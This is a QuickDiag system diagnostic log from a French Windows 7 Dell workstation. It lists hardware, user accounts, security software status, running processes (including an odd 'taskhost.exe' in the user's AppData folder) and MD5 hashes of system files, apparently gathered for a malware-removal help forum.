--------------- QuickDiag | g3n-h@ckm@n | V3_01.07.17.1 ---------------

----- XP | Vista | 7 | 8 | 8.1 | 10 - 32/64 bits ----- - Start 13/07/2017 22:13:45

Updated 01/07/2017 | 11.30 (GMT) by g3n-h@ckm@n
Contact : http://www.sosvirus.net/

Time Zone : (UTC) Temps universel coordonné
[PC (Administrator)] - [PC-PC] (S-1-5-21-2557276657-2545994043-460956459-1000)

System: Microsoft Windows 7 Professionnel - Service Pack 1 - (6.1.7601) -  BuildType: Multiprocessor Free - OSLanguage: 1036 (040c) -> ()
System: AutoReboot: True - DebugFilePath: %SystemRoot%\MEMORY.DMP - KernelDumpOnly: False - OverwriteExistingDebugFile: True - WriteDebugInfo: True - WriteToSystemLog: True
Boot : Microsoft Windows 7 Professionnel |C:\Windows|\Device\Harddisk0\Partition2
Boot : Normal boot
PC: Precision WorkStation T5500  - Dell Inc. - IdNumber: DZ3QP4J - UUID: 4C4C4544-005A-3310-8051-C4C04F50344A
Processor : X64 - 2660 Mhz - Intel(R) Xeon(R) CPU           X5550  @ 2.67GHz
Phoenix ROM BIOS PLUS Version 1.10 A16 - en|US|iso8859-1 - Dell Inc. - S/N: DZ3QP4J - A16 - DELL  - 15
CoreTemp : ? Celsius

----------| Quick


---------- | SoundDevice

SoundMAX Integrated Digital High Definition Audio - Status: OK - Manufacturer: Analog Devices - PNPDeviceID: HDAUDIO\FUNC_01&VEN_11D4&DEV_194A&SUBSYS_1028026E&REV_1004\4&CD6E9E4&0&0001
AMD High Definition Audio Device - Status: OK - Manufacturer: Advanced Micro Devices - PNPDeviceID: HDAUDIO\FUNC_01&VEN_1002&DEV_AA01&SUBSYS_00AA0100&REV_1002\5&14EC76C5&0&0001

---------- | Video

AMD Radeon HD 6800 Series - Resolution: 1280x1024 - Colors: 4294967296 - RefreshRate: 60 - 32 Bits Per Pixel - DeviceID: VideoController1 - Drivers: aticfx64.dll,aticfx64.dll,aticfx64.dll,aticfx32,aticfx32,aticfx32,atiumd64.dll,atidxx64.dll,atidxx64.dll,atiumdag,atidxx32,atidxx32,atiumdva,atiumd6a.cap,atitmm64.dll - PNPDeviceID: PCI\VEN_1002&DEV_6738&SUBSYS_03B01043&REV_00\4&285359D1&0&0018 - AdapterCompatibility: Advanced Micro Devices, Inc. - RAM: 1073741824
Inegrated Video Chipset DeviceName: AMD Radeon HD 6800 Series - DriverVersion: 8.14.01.6489 - SpecificationVersion: 1025

---------- | Codecs

c:\windows\system32\msrle32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 16384 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msvidc32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 38912 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\imaadp32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 22016 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msg711.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 14848 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msgsm32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 29184 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msadp32.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 24064 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\msyuv.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 25600 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\iyuv_32.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 54272 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\tsbyuv.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 14848 -  Manufacturer: Microsoft Corporation - Status: OK
c:\windows\system32\l3codeca.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 81408 -  Manufacturer: Fraunhofer Institut Integrierte Schaltungen IIS - Status: OK
c:\windows\system32\bdmjpeg64.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 25640 -  Manufacturer: - Status: OK
c:\windows\system32\bdmpegv64.dll - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 70200 -  Manufacturer: - Status: OK
c:\windows\system32\bdmpega64.acm - ClassName: Win32_CodecFile - FSName: NTFS - FileSize: 70712 -  Manufacturer: - Status: OK

---------- | CPU

CPU #1 value:0 %
CPU #2 value:0 %
CPU #3 value:6 %
CPU #4 value:0 %
CPU #5 value:6 %
CPU #6 value:0 %
CPU #7 value:0 %
CPU #8 value:0 %
Total Overall CPU Usage value:2 %

---------- | Network

Contrôleur Broadcom NetXtreme 57xx Gigabit : SENT:4,856 bytes/sec / RECVD:4,856 bytes/sec
isatap.{AD8C7EE0-625C-4694-ACBF-5633AE50D142} : SENT:0 bytes/sec / RECVD:0 bytes/sec
Teredo Tunneling Pseudo-Interface : SENT:1,634 bytes/sec / RECVD:1,634 bytes/sec
isatap.{AABC8FBB-D874-4611-A58E-5EA85224BB36} : SENT:0 bytes/sec / RECVD:0 bytes/sec

Overall -> SEND Maxium:4,856 bytes/sec,  /  RECEIVE Maximum:4,856 bytes/sec

WAN Miniport (SSTP) - - Microsoft - Status: - PnPID : ROOT\MS_SSTPMINIPORT\0000
WAN Miniport (IKEv2) - - Microsoft - Status: - PnPID : ROOT\MS_AGILEVPNMINIPORT\0000
WAN Miniport (L2TP) - - Microsoft - Status: - PnPID : ROOT\MS_L2TPMINIPORT\0000
WAN Miniport (PPTP) - - Microsoft - Status: - PnPID : ROOT\MS_PPTPMINIPORT\0000
WAN Miniport (PPPOE) - - Microsoft - Status: - PnPID : ROOT\MS_PPPOEMINIPORT\0000
WAN Miniport (IPv6) - - Microsoft - Status: - PnPID : ROOT\MS_NDISWANIPV6\0000
WAN Miniport (Network Monitor) - - Microsoft - Status: - PnPID : ROOT\MS_NDISWANBH\0000
Contrôleur Broadcom NetXtreme 57xx Gigabit - Ethernet 802.3 - Broadcom - Status: - PnPID : PCI\VEN_14E4&DEV_1681&SUBSYS_026E1028&REV_10\4&30CED0F2&0&00E5
WAN Miniport (IP) - - Microsoft - Status: - PnPID : ROOT\MS_NDISWANIP\0000
Carte Microsoft ISATAP - Tunnel - Microsoft - Status: - PnPID : ROOT\*ISATAP\0000
RAS Async Adapter - - - Status: - PnPID : 
Teredo Tunneling Pseudo-Interface - Tunnel - Microsoft - Status: - PnPID : ROOT\*TEREDO\0000
Carte Microsoft ISATAP #2 - Tunnel - Microsoft - Status: - PnPID : ROOT\*ISATAP\0001
HUAWEI Mobile Connect - 3G Network Card - - - Status: - PnPID : 
TAP-Win32 Adapter V9 (Tunngle) - Ethernet 802.3 - TAP-Win32 Provider V9 (Tunngle) - Status: - PnPID : ROOT\NET\0000
Carte Microsoft 6to4 - Tunnel - Microsoft - Status: - PnPID : ROOT\*6TO4MP\0000

---------- | Memory

RAM = Total (MB) : 12580 | Free (MB) : 10206
Pagefile = Total (MB) : 25159 | Free (MB) : 22654
Virtual = Total (MB) : 4194 | Free (MB) : 4008

Physical Memory 0 : Capacity: 2147483648 - DIMM 1          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 239167CA
Physical Memory 1 : Capacity: 2147483648 - DIMM 2          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 2710E8FF
Physical Memory 2 : Capacity: 2147483648 - DIMM 3          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 238167CB
Physical Memory 3 : Capacity: 2147483648 - DIMM 4          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 2740E8DE
Physical Memory 4 : Capacity: 2147483648 - DIMM 5          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 237167C9
Physical Memory 5 : Capacity: 2147483648 - DIMM 6          - Posit.: - Manufacturer: 80AD000080AD    - PartNumber: HMT125U7AFP8C-H9  - S/N: 2790E907

---------- | SID Users

Administrateur : [S-1-5-21-2557276657-2545994043-460956459-500]
HomeGroupUser$ : [S-1-5-21-2557276657-2545994043-460956459-1002]
Invité : [S-1-5-21-2557276657-2545994043-460956459-501]
PC : [S-1-5-21-2557276657-2545994043-460956459-1000]
Administrateurs : [S-1-5-32-544]
Duplicateurs : [S-1-5-32-552]
IIS_IUSRS : [S-1-5-32-568]
Invités : [S-1-5-32-546]
Lecteurs des journaux d’événements : [S-1-5-32-573]
Opérateurs de chiffrement : [S-1-5-32-569]
Opérateurs de configuration réseau : [S-1-5-32-556]
Opérateurs de sauvegarde : [S-1-5-32-551]
Utilisateurs : [S-1-5-32-545]
Utilisateurs avec pouvoir : [S-1-5-32-547]
Utilisateurs de l’Analyseur de performances : [S-1-5-32-558]
Utilisateurs du Bureau à distance : [S-1-5-32-555]
Utilisateurs du journal de performances : [S-1-5-32-559]
Utilisateurs du modèle COM distribué : [S-1-5-32-562]
HomeUsers : [S-1-5-21-2557276657-2545994043-460956459-1001]

---------- | SystemAccounts

Name: Tout le monde - SID: S-1-1-0 - SIDType: 5 - Status: OK
Name: LOCAL - SID: S-1-2-0 - SIDType: 5 - Status: OK
Name: CREATEUR PROPRIETAIRE - SID: S-1-3-0 - SIDType: 5 - Status: OK
Name: GROUPE CREATEUR - SID: S-1-3-1 - SIDType: 5 - Status: OK
Name: CREATOR OWNER SERVER - SID: S-1-3-2 - SIDType: 5 - Status: OK
Name: CREATOR GROUP SERVER - SID: S-1-3-3 - SIDType: 5 - Status: OK
Name: DROITS DU PROPRIÉTAIRE - SID: S-1-3-4 - SIDType: 5 - Status: OK
Name: LIGNE - SID: S-1-5-1 - SIDType: 5 - Status: OK
Name: RESEAU - SID: S-1-5-2 - SIDType: 5 - Status: OK
Name: TACHE - SID: S-1-5-3 - SIDType: 5 - Status: OK
Name: INTERACTIF - SID: S-1-5-4 - SIDType: 5 - Status: OK
Name: SERVICE - SID: S-1-5-6 - SIDType: 5 - Status: OK
Name: ANONYMOUS LOGON - SID: S-1-5-7 - SIDType: 5 - Status: OK
Name: Proxy - SID: S-1-5-8 - SIDType: 5 - Status: OK
Name: Système - SID: S-1-5-18 - SIDType: 5 - Status: OK
Name: ENTERPRISE DOMAIN CONTROLLERS - SID: S-1-5-9 - SIDType: 5 - Status: OK
Name: SELF - SID: S-1-5-10 - SIDType: 5 - Status: OK
Name: Utilisateurs authentifiés - SID: S-1-5-11 - SIDType: 5 - Status: OK
Name: RESTRICTED - SID: S-1-5-12 - SIDType: 5 - Status: OK
Name: UTILISATEUR TERMINAL SERVER - SID: S-1-5-13 - SIDType: 5 - Status: OK
Name: REMOTE INTERACTIVE LOGON - SID: S-1-5-14 - SIDType: 5 - Status: OK
Name: IUSR - SID: S-1-5-17 - SIDType: 5 - Status: OK
Name: SERVICE LOCAL - SID: S-1-5-19 - SIDType: 5 - Status: OK
Name: SERVICE RÉSEAU - SID: S-1-5-20 - SIDType: 5 - Status: OK
Name: BUILTIN - SID: S-1-5-32 - SIDType: 3 - Status: OK

---------- | Drives

C:\ -> [Fixed] | [] | Total : 488.18 Go | Free : 133.18 Go -> NTFS [RAID]
D:\ -> [Fixed] | [] | Total : 908.98 Go | Free : 70.24 Go -> NTFS [RAID]
G:\ -> [CDROM] | [Patrician IV GOL] | Total : 5.8 Go | Free : 0 Go -> CDFS [FileBackedVirtual]

Disk Usage Information [1 total Physical Disks]

Physical Drive #0 [C:, D:] : Read:65,558 bytes/sec, Written:0 bytes/sec Max Read:65,558 bytes/sec, Max Write:0 bytes/sec 

Overall - Read Maximum:65,558 bytes/sec, Write Maximum:0 bytes/sec

DeviceID: \\.\PHYSICALDRIVE0 - Status: OK - SCSI - Fixed hard disk media - 3 Part. - PnPID : IDE\DISKWDC_WD15EVDS-63V9B1_____________________01.00A01\4&2E284E25&0&0.0.0

---------- | Windows updates

Last detection : 2017-01-21 12:45:39
Downloaded last ones : 2017-01-21 16:29:15
Installed last ones : 2017-01-21 14:25:38

Test 1 : Windows Is Activated

---------- | Browsers

IE : 8.0.7601.17514     (© Microsoft Corporation. Tous droits réservés.)
FF : 33.0.0.5397     (©Firefox and Mozilla Developers; available under the MPL 2 license.)
GC : 59.0.3071.115     (Copyright 2016 Google Inc.)

Default : "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" -- ""

---------- | FlashPlayer

FlashPlayer ActiveX : 15.0.0.189
FlashPlayer Plugin : 26.0.0.137

---------- | Security

AV : avast! Antivirus Disabled
AS : Windows Defender Enabled
FW : WINDOWS Firewall
WMI : OK
WU: Windows Update Service [Auto(2)] = Running
AS: Windows Defender [Auto(2)] = Running
WMI: Windows Management Instrumentation [Auto(2)] = Running



---------- | Running processes

408 | [Owner : Système | Parent : 4(System) | 1.41 Mo] - (.Microsoft Corporation - Gestionnaire de sessions Windows.) - (6.1.7601.23572) = C:\Windows\System32\smss.exe     [21/01/2017 13:19:04]    CPU Usage:0 %
508 | [Owner : Système | Parent : 500() | 4.64 Mo] - (.Microsoft Corporation - Processus d’exécution client-serveur.) - (6.1.7600.16385) = C:\Windows\System32\csrss.exe     [13/07/2009 23:19:49]    CPU Usage:0 %
564 | [Owner : Système | Parent : 500() | 5.19 Mo] - (.Microsoft Corporation - Application de démarrage de Windows.) - (6.1.7600.16385) = C:\Windows\System32\wininit.exe     [13/07/2009 23:52:37]    CPU Usage:0 %
588 | [Owner : Système | Parent : 576() | 15.42 Mo] - (.Microsoft Corporation - Processus d’exécution client-serveur.) - (6.1.7600.16385) = C:\Windows\System32\csrss.exe     [13/07/2009 23:19:49]    CPU Usage:0 %
624 | [Owner : Système | Parent : 564(wininit.exe) | 10.32 Mo] - (.Microsoft Corporation - Applications Services et Contrôleur.) - (6.1.7601.18829) = C:\Windows\System32\services.exe     [21/01/2017 13:28:33]    CPU Usage:0 %
652 | [Owner : Système | Parent : 564(wininit.exe) | 11.83 Mo] - (.Microsoft Corporation - Local Security Authority Process.) - (6.1.7601.23642) = C:\Windows\System32\lsass.exe     [21/01/2017 13:19:03]    CPU Usage:0 %
660 | [Owner : Système | Parent : 564(wininit.exe) | 4.86 Mo] - (.Microsoft Corporation - Service du gestionnaire de session locale.) - (6.1.7601.17514) = C:\Windows\System32\lsm.exe     [20/01/2017 21:34:24]    CPU Usage:0 %
752 | [Owner : Système | Parent : 576() | 8.61 Mo] - (.Microsoft Corporation - Application d’ouverture de session Windows.) - (6.1.7601.18540) = C:\Windows\System32\winlogon.exe     [21/01/2017 13:29:33]    CPU Usage:0 %
804 | [Owner : Système | Parent : 624(services.exe) | 10.91 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
884 | [Owner : SERVICE RÉSEAU | Parent : 624(services.exe) | 9.51 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
984 | [Owner : Système | Parent : 624(services.exe) | 5.39 Mo] - (.AMD - AMD External Events Service Module.) - (6.14.11.1209) = C:\Windows\System32\atiesrxx.exe     [26/02/2016 20:03:42]    CPU Usage:0 %
148 | [Owner : SERVICE LOCAL | Parent : 624(services.exe) | 20.14 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
336 | [Owner : Système | Parent : 624(services.exe) | 142.31 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
484 | [Owner : Système | Parent : 624(services.exe) | 37.31 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1104 | [Owner : SERVICE LOCAL | Parent : 624(services.exe) | 12.32 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1156 | [Owner : Système | Parent : 984(atiesrxx.exe) | 8.23 Mo] - (.AMD - AMD External Events Client Module.) - (6.14.11.1209) = C:\Windows\System32\atieclxx.exe     [26/02/2016 20:03:54]    CPU Usage:0 %
1228 | [Owner : SERVICE RÉSEAU | Parent : 624(services.exe) | 18.28 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1328 | [Owner : SERVICE LOCAL | Parent : 624(services.exe) | 19.9 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1468 | [Owner : Système | Parent : 624(services.exe) | 12.41 Mo] - (.Microsoft Corporation - Application sous-système spouleur.) - (6.1.7601.17514) = C:\Windows\System32\spoolsv.exe     [20/01/2017 21:34:17]    CPU Usage:0 %
1580 | [Owner : Système | Parent : 624(services.exe) | 4.24 Mo] - (.Adobe Systems Incorporated - Adobe Acrobat Update Service.) - (1.824.21.4663) = C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe     [03/02/2017 06:21:46]    CPU Usage:0 %
1600 | [Owner : Système | Parent : 624(services.exe) | 5.1 Mo] - (.-.) - (0.0.0.0) = C:\Program Files\Modem X080C Plus\DataCardService.exe     [22/07/2015 13:02:12]    CPU Usage:0 %
1628 | [Owner : Système | Parent : 624(services.exe) | 8.31 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1664 | [Owner : Système | Parent : 624(services.exe) | 9.39 Mo] - (.Digital Wave Ltd. - Digital Wave Update Service.) - (1.0.43.1027) = C:\Program Files (x86)\Common Files\DVDVideoSoft\lib\app_updater.exe     [09/01/2017 18:59:07]    CPU Usage:0 %
1816 | [Owner : PC | Parent : 336(svchost.exe) | 40.66 Mo] - (.Microsoft Corporation - Gestionnaire de fenêtres du Bureau.) - (6.1.7600.16385) = C:\Windows\System32\dwm.exe     [13/07/2009 23:37:38]    CPU Usage:0 %
1824 | [Owner : Système | Parent : 1600(DataCardService.exe) | 5.88 Mo] - (.-.) - (1.7.0.0) = C:\Program Files\Modem X080C Plus\BGService.exe     [05/05/2012 17:24:00]    CPU Usage:0 %
1832 | [Owner : PC | Parent : 624(services.exe) | 10.32 Mo] - (.Microsoft Corporation - Processus hôte pour Tâches Windows.) - (6.1.7601.17514) = C:\Windows\System32\taskhost.exe     [20/01/2017 21:33:56]    CPU Usage:0 %
1244 | [Owner : PC | Parent : 1808() | 65.12 Mo] - (.Microsoft Corporation - Explorateur Windows.) - (6.1.7601.17514) = C:\Windows\explorer.exe     [20/01/2017 21:34:43]    CPU Usage:0 %
2176 | [Owner : Système | Parent : 624(services.exe) | 6.6 Mo] - (.- DCSHOST.) - (2.0.0.61) = C:\ProgramData\DatacardService\HWDeviceService64.exe     [28/10/2013 02:02:26]    CPU Usage:0 %
2252 | [Owner : PC | Parent : 2176(HWDeviceService64.exe) | 6.72 Mo] - (.Huawei Technologies Co., Ltd. - DataCardMonitor MFC Application.) - (2.0.0.61) = C:\ProgramData\DatacardService\DCSHelper.exe     [28/10/2013 02:02:24]    CPU Usage:0 %
2360 | [Owner : Système | Parent : 2272() | 5.54 Mo] - (.-.) - (0.0.0.0) = C:\ProgramData\Modem HDM EC156\OnlineUpdate\ouc.exe     [08/07/2016 17:07:51]    CPU Usage:0 %
2400 | [Owner : SERVICE LOCAL | Parent : 624(services.exe) | 6.15 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
2584 | [Owner : Système | Parent : 624(services.exe) | 40.3 Mo] - (.Malwarebytes - Malwarebytes Service.) - (3.1.0.479) = C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe     [27/06/2017 12:08:28]    CPU Usage:0 %
2808 | [Owner : Système | Parent : 624(services.exe) | 39.63 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
2828 | [Owner : SERVICE RÉSEAU | Parent : 624(services.exe) | 6.44 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
1736 | [Owner : PC | Parent : 1244(explorer.exe) | 34.49 Mo] - (.Advanced Micro Devices, Inc. - Radeon Settings: Host Application.) - (10.1.1.1522) = C:\Program Files\AMD\CNext\CNext\cnext.exe     [26/02/2016 15:55:54]    CPU Usage:0 %
2424 | [Owner : PC | Parent : 1244(explorer.exe) | 17.53 Mo] - (.Malwarebytes - Malwarebytes Tray Application.) - (3.0.0.1068) = C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe     [27/06/2017 12:08:26]    CPU Usage:0 %
2276 | [Owner : PC | Parent : 1244(explorer.exe) | 79.36 Mo] - (.Valve Corporation - Steam Client Bootstrapper.) - (4.5.3.68) = C:\Program Files (x86)\Steam\Steam.exe     [16/09/2014 21:10:54]    CPU Usage:0 %
3192 | [Owner : PC | Parent : 1244(explorer.exe) | 71.63 Mo] - (.Microsoft - Host Process for Windows Tasks.) - (6.3.9600.17415) = C:\Users\PC\AppData\Local\Microsoft Windows\taskhost.exe     [07/04/2016 22:00:42]    CPU Usage:0 %
3312 | [Owner : PC | Parent : 1244(explorer.exe) | 69.05 Mo] - (.Skype Technologies S.A. - Skype.) - (7.31.80.104) = C:\Program Files (x86)\Skype\Phone\Skype.exe     [20/12/2016 19:35:30]    CPU Usage:0 %
3328 | [Owner : PC | Parent : 1244(explorer.exe) | 45.17 Mo] - (.BitTorrent Inc. - µTorrent.) - (3.5.0.43916) = C:\Users\PC\AppData\Roaming\uTorrent\uTorrent.exe     [13/11/2014 18:40:00]    CPU Usage:0 %
3336 | [Owner : Système | Parent : 624(services.exe) | 18.35 Mo] - (.Microsoft Corporation - Indexeur Microsoft Windows Search.) - (7.0.7600.16385) = C:\Windows\System32\SearchIndexer.exe     [14/07/2009 00:32:27]    CPU Usage:0 %
3348 | [Owner : PC | Parent : 1244(explorer.exe) | 25.35 Mo] - (.http://tortoisesvn.net - TortoiseSVN client.) - (1.9.5.27581) = C:\Program Files\TortoiseSVN\bin\TortoiseProc.exe     [26/11/2016 14:48:52]    CPU Usage:0 %
3404 | [Owner : PC | Parent : 1244(explorer.exe) | 11.25 Mo] - (.Gaijin Entertainment - Gaijin.Net Agent.) - (1.0.0.0) = C:\Users\PC\AppData\Local\Gaijin\Program Files (x86)\NetAgent\gjagent.exe     [20/02/2017 21:54:50]    CPU Usage:0 %
3412 | [Owner : PC | Parent : 1216() | 11.04 Mo] - (.Microsoft Corporation - Installateur Windows®.) - (5.0.7601.23593) = C:\Windows\SysWOW64\msiexec.exe     [21/01/2017 13:19:04]    CPU Usage:0 %
3428 | [Owner : PC | Parent : 1244(explorer.exe) | 72.84 Mo] - (.Microsoft Corporation - Windows PowerShell.) - (6.1.7600.16385) = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe     [13/07/2009 23:32:37]    CPU Usage:0 %
3480 | [Owner : PC | Parent : 588(csrss.exe) | 5.76 Mo] - (.Microsoft Corporation - Hôte de la fenêtre de la console.) - (6.1.7601.23572) = C:\Windows\System32\conhost.exe     [21/01/2017 13:19:09]    CPU Usage:0 %
3644 | [Owner : PC | Parent : 3492() | 5 Mo] - (.AVAST Software - avast! Antivirus.) - (7.0.1474.765) = C:\Program Files\AVAST Software\Avast\AvastUI.exe     [07/11/2014 11:59:19]    CPU Usage:0 %
3660 | [Owner : PC | Parent : 1244(explorer.exe) | 8.69 Mo] - (.http://tortoisesvn.net - TortoiseSVN status cache.) - (1.9.5.27581) = C:\Program Files\TortoiseSVN\bin\TSVNCache.exe     [26/11/2016 14:48:54]    CPU Usage:0 %
3744 | [Owner : SERVICE LOCAL | Parent : 624(services.exe) | 43.72 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\System32\svchost.exe     [13/07/2009 23:31:13]    CPU Usage:0 %
4032 | [Owner : PC | Parent : 3328(uTorrent.exe) | 22.45 Mo] - (.BitTorrent Inc. - WebHelper.) - (1.0.0.43916) = C:\Users\PC\AppData\Roaming\uTorrent\updates\3.5.0_43916\utorrentie.exe     [30/06/2017 12:43:00]    CPU Usage:0 %
3780 | [Owner : PC | Parent : 3328(uTorrent.exe) | 22.65 Mo] - (.BitTorrent Inc. - WebHelper.) - (1.0.0.43916) = C:\Users\PC\AppData\Roaming\uTorrent\updates\3.5.0_43916\utorrentie.exe     [30/06/2017 12:43:00]    CPU Usage:0 %
2224 | [Owner : PC | Parent : 804(svchost.exe) | 25.06 Mo] - (.Skype Technologies - Skype Browser Host.) - (6.13.0.233) = C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe     [13/10/2016 11:28:36]    CPU Usage:0 %
5308 | [Owner : PC | Parent : 5216() | 10.07 Mo] - (.Microsoft Corporation - Installateur Windows®.) - (5.0.7601.23593) = C:\Windows\SysWOW64\msiexec.exe     [21/01/2017 13:19:04]    CPU Usage:0 %
5460 | [Owner : PC | Parent : 2276(Steam.exe) | 38.45 Mo] - (.Valve Corporation - Steam Client WebHelper.) - (4.5.3.68) = C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe     [13/12/2016 14:56:31]    CPU Usage:0 %
5620 | [Owner : Système | Parent : 624(services.exe) | 12.64 Mo] - (.Valve Corporation - Steam Client Service.) - (4.5.3.68) = C:\Program Files (x86)\Common Files\Steam\SteamService.exe     [22/11/2014 13:21:09]    CPU Usage:0 %
5720 | [Owner : PC | Parent : 3300() | 10 Mo] - (.Piriform Ltd - CCleaner.) - (5.1.0.5075) = C:\Program Files\CCleaner\CCleaner64.exe     [12/12/2014 17:21:24]    CPU Usage:0 %
5316 | [Owner : Système | Parent : 624(services.exe) | 8.57 Mo] - (.Microsoft Corporation - Processus hôte pour les services Windows.) - (6.1.7600.16385) = C:\Windows\SysWOW64\svchost.exe     [13/07/2009 23:19:28]    CPU Usage:0 %
1396 | [Owner : SERVICE RÉSEAU | Parent : 624(services.exe) | 5.07 Mo] - (.Microsoft Corporation - Service Partage réseau du Lecteur Windows Media.) - (12.0.7601.17514) = C:\Program Files\Windows Media Player\wmpnetwk.exe     [20/01/2017 21:34:35]    CPU Usage:0 %
6116 | [Owner : SERVICE LOCAL | Parent : 148(svchost.exe) | ?????] - (.Microsoft Corporation - Isolation graphique de périphérique audio Windows.) - (6.1.7601.23471) = C:\Windows\System32\audiodg.exe     [21/01/2017 13:19:05]    CPU Usage:0 %
476 | [Owner : PC | Parent : 1244(explorer.exe) | 32.06 Mo] - (.SosVirus - QuickDiag.) - (1.7.17.1) = C:\Users\PC\Desktop\QuickDiag.exe     [13/07/2017 22:13:09]    CPU Usage:0 %
3452 | [Owner : SERVICE RÉSEAU | Parent : 804(svchost.exe) | 11.28 Mo] - (.Microsoft Corporation - WMI Provider Host.) - (6.1.7601.17514) = C:\Windows\System32\wbem\WmiPrvSE.exe     [20/01/2017 21:34:33]    CPU Usage:0 %
3260 | [Owner : Système | Parent : 804(svchost.exe) | 7.08 Mo] - (.Microsoft Corporation - WMI Provider Host.) - (6.1.7601.17514) = C:\Windows\System32\wbem\WmiPrvSE.exe     [20/01/2017 21:34:33]    CPU Usage:0 %
2336 | [Owner : SERVICE RÉSEAU | Parent : 804(svchost.exe) | 7.62 Mo] - (.Microsoft Corporation - WMI Provider Host.) - (6.1.7601.17514) = C:\Windows\SysWOW64\wbem\WmiPrvSE.exe     [20/01/2017 21:34:17]    CPU Usage:0 %
6048 | [Owner : SERVICE RÉSEAU | Parent : 624(services.exe) | 9.12 Mo] - (.Microsoft Corporation - Service de la plateforme de protection logicielle Microsoft.) - (6.1.7601.17514) = C:\Windows\System32\sppsvc.exe     [20/01/2017 21:33:44]    CPU Usage:0 %

---------- | MD5

[MD5.AC4C51EB24AA95B77F705AB159189E24] - [20/01/2017 21:34:43] - (.© Microsoft Corporation. Tous droits réservés. - Explorateur Windows.) - [2805 Ko] - (6.1.7601.17514) : C:\Windows\Explorer.exe
[MD5.5746BD7E255DD6A8AFA06F7C42C1BA41] - [20/01/2017 21:34:22] - (.© Microsoft Corporation. Tous droits réservés. - Interpréteur de commandes Windows.) - [337 Ko] - (6.1.7601.17514) : C:\Windows\System32\cmd.exe
[MD5.60C2862B4BF0FD9F582EF344C2B1EC72] - [13/07/2009 23:19:49] - (.© Microsoft Corporation. Tous droits réservés. - Processus d’exécution client-serveur.) - [7.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\csrss.exe
[MD5.A8EDB86FC2A4D6D1285E4C70384AC35A] - [13/07/2009 23:59:17] - (.© Microsoft Corporation. - COM Surrogate.) - [9.5 Ko] - (6.1.7600.16385) : C:\Windows\System32\dllhost.exe
[MD5.0B5A8B1E0A3CF06802CEF191FC802736] - [21/01/2017 13:19:14] - (.© Microsoft Corporation. Tous droits réservés. - DLL du client API BASE Windows NT.) - [1136 Ko] - (6.1.7601.23572) : C:\Windows\System32\Kernel32.dll
